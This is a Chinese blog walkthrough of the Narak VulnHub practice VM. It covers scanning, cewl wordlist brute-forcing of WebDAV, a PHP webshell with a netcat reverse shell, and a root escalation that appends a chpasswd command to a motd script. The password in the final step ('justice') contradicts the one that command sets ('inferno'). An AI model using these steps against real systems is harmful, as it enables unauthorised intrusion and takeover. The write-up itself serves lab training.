narak 靶机实验实战演练

已于 2022-08-03 11:52:07 修改
阅读量1.1k 收藏 5
点赞数 1
分类专栏: 学习 文章标签: 安全
于 2022-08-02 16:47:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lianliandad/article/details/126125669
版权

靶机:NARAK

kali : 192.168.71.128

靶机 :192.168.71.129

渗透流程:

  1. 探测靶机ip地址

命令:fping -aqg 192.168.71.0/24

2. nmap进行靶机端口服务扫描

命令:nmap -sC -sV 192.168.71.129 -n -vv -min-rate=2000

3.进行web页面登录

通过查看网页源码,可见没有什么可以利用的

目录扫描

使用kali中的dirb工具进行目录扫描:

命令: dirb http://192.168.71.129

通过扫描后,查看发现了有一个webdav目录。

192.168.71.129/webdav

然后去访问这个目录试试,发现需要用户名密码登录。

这时,我们使用kali 下的cewl 字典生成工具 爬取该页面存在的密码,生成一个password.txt 文件。

命令:cewl 192.168.71.129 -w password.txt

密码本爆破

账号: yamdoot

密码: Swarg

上传webshell.php

命令:put webshell.php

上传成功之后,需要访问192.168.71.129建立反向连接,访问网站之前开启监听,监听命方法如下:nc -lvvp 4444

重新去访问:192.168.71.129/webdav ,点击刚刚上传的 webshell.php

看到如下情况说明成功回弹webshell

通过python进行交互:

python3 -c  ‘import pty;pty.spawn(“/bin/bash”)’

注:这里的引号都是需要英文状态下输入

可以看到home下有三个用户:inferno narakyamdoot

发现了/mnt 目录下 的 hell.sh 文件

通过 登录 BF 在线解码  

网址:https://www.splitbrain.org/services/ook

通过点击 Brainfuck to Text 进行解码得到 chitragupt

依次使用home家目录下的用户名,以及BF解码后的密码进行提权;

用户名:inferno

密码为:chitragupt

当尝试到切换到 用户名为 inferno  进行su 提权 时可以成功登录

ls 发现user.txt文件

cat查看txt文件,得到Flag;

5. 提权:

修改00-header

echo "echo 'root:inferno'|sudo chpasswd" >> /etc/update-motd.d/00-header

退出重新登录,su root刚刚更改的密码:

su - root

password:justice

燕返故人归来
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红队打靶:Narak打靶思路详解(vulnhub)
Bossfrank的博客
09-02 991
本文是vulnhub靶机Narak的详细打靶过程,涉及到的知识点包括tftp协议的使用、dav工具的使用、brainfuck语句和motd脚本提权等。知识点很密,需要实操打靶才会有深刻理解。。
narak靶场实战详解
Askshhbs的博客
04-22 1954
网络安全,web,Kali,渗透测试相关课件,工具,资料 可以关注公众号:“掌控安全课堂” 回复:“我想学黑客”即可免费获得 靶机:https://download.vulnhub.com/ha/narak.ova 注释:使用vmwarworkstation运行虚拟机 难度:中+ 目标:取得root权限+2Flag 网络配置:这里简单介绍下我的网络配置,靶机和Kali都用的VMware,然后使用nat连接,开启了dhcp。 0x00 环境配置 虚拟网络编辑器: Kali: 靶机
网络安全最新靶机渗透之narak(1),跳槽字节跳动
2401_84558314的博客
05-15 340
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Narak靶机渗透
weixin_56306210的博客
01-31 452
Narak靶机渗透
[VulnHub靶机渗透] HA: Narak
人若无名,便可专心练剑
02-22 1492
学渗透必打百台靶机实操精讲-Narak。涉及UDP突破,TFTP信息泄漏,webdav反弹shell上传。二级提权,第一级通过找到可写bash脚本文件中的brainfuck语句,获得凭据,二级通过motd脚本获得root权限。相比之前的视频,增加了些新知识,值得玩味的攻击链。可以结合靶机实操。
靶机渗透之narak
weixin_64267091的博客
02-04 1084
在这次靶机渗透过程中,走到漏洞分析阶段路就断了,发现在信息收集部分可能遗漏掉一些重要信息,最后又重点扫描了一些常见的UDP端口,最后扫出来了一个69端口。然后就利用这个服务找到了一个用户名及其密码,成功访问webdav。然后使用davtest测试webdav可以上传和执行哪些文件,发现可以上传并执行php,利用cadaver客户端上传反弹shell的php文件并访问shell.php,然后通过寻找敏感文件初步提权,找到brainfuck代码,用beef工具解码,发现了用户名inferno的ssh密码。
narak靶机
qq_44640313的博客
10-15 241
UDP突破,TFTP信息泄漏,webdav反弹shell上传。二级提权,第一级通过找到可写bash脚本文件中的brainfuck语句,获得凭据,二级通过motd脚本获得root权限
靶机练习 narak ,个人学习心得
09-08
靶机练习 NARAK,个人学习心得 靶机练习 靶机练习是渗透测试的重要组成部分,它可以帮助我们检测系统中的安全漏洞和脆弱性。在这个练习中,我们使用的靶机NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP ...
Google搜索引擎算法的秘密
05-18
在IT行业中,搜索引擎优化(SEO)是至关重要的领域,尤其是对于Google搜索引擎,它的算法秘密一直是业界探讨的焦点。Google作为全球最广泛使用的搜索引擎,其强大的搜索能力得益于不断更新和优化的算法。...
Goruntu-Isleme
02-21
Bu komşuların sınıfları sayısının toplamı alınarak, en sık görülen sınıf o noktanın sınıflandırması olarak seçilir. **Jupyter Notebook Kullanımı** Jupyter Notebook, bilimsel ...
narak靶机打靶过程及思路
qq_52610024的博客
05-19 271
使用hydra进行爆破hydra-Ldict.txt-Pdict.txt10.1.8.133http-get/webdav-v后面的意思是使用http。继续查找文件find/-typef-userroot-perm-ug=x,o=w-execls-l‘{}’;上传反弹shell的php文件/usr/share/webshells/php/php-reverse-shell.php。使用CVE-2021-3493漏洞进行提权,提权成功拿下root账号。...
narak靶机总结
weixin_51692662的博客
11-06 644
webdav、narak靶机、motd提权
靶机9:NARAK
wj33333的博客
10-31 103
注:改靶机是一个固定IP:需要配置网络固定IP:192.168.26.0。
靶机渗透测试:narak
x_13579的博客
07-03 438
hydra爆破,cewl爬取
Vulnhub:narak靶机练习教程
m0_74887243的博客
05-13 164
使用dirb扫描网页目录,发现了webdav的路径,访问需要用户名和密码。目标:找到两个flag:user.txt root.txt。靶机22端口开启ssh服务;80端口开启http服务。使用kali自带的字典生成工具,从网页上爬取信息。访问靶机ip查看网页源代码,没有太大帮助。将webshell上传到webdav。使用ssh的登陆inferno。攻击机和靶机都使用net模式。使用nmap扫描到靶机ip。找到上传路径,上传成功。
vulunhub靶机——narak测试思路
最新发布
hxh108的博客
06-22 745
1、下载好narak靶机之后,在VM虚拟机中打开,设置网络连接为nat模式,同时设置kali同样为nat模式。
VulnHub靶场HA: NARAK练习 - 修改00-header文件进行提权
qq_43232893的博客
10-15 614
VulnHub靶场HA: NARAK练习简介开始 简介 攻击机ip:192.168.255.139 靶机ip: 192.168.255.142 靶机下载地址: 开始 使用nmap找到靶机地址并扫描端口 找到靶机ip,使用nmap -sV -Pn -p- -v 192.168.255.142进行端口扫描 发现开启了个80跟22端口,访问一下80端口: 什么都没有,再看看有没有敏感目录 发现了一个401登录界面 利用cewl生成字典 cewl 192.168.255.142 -w 1.txt 再使
Vulnhub-HA-NARAK靶机测试
qq_46015509的博客
04-24 2535
Vulnhub-HA-NARAK 靶机渗透
靶机渗透测试(HA: NARAK
@小张小张的博客
10-24 2847
靶机渗透测试(HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy–Intermediate) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.0
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值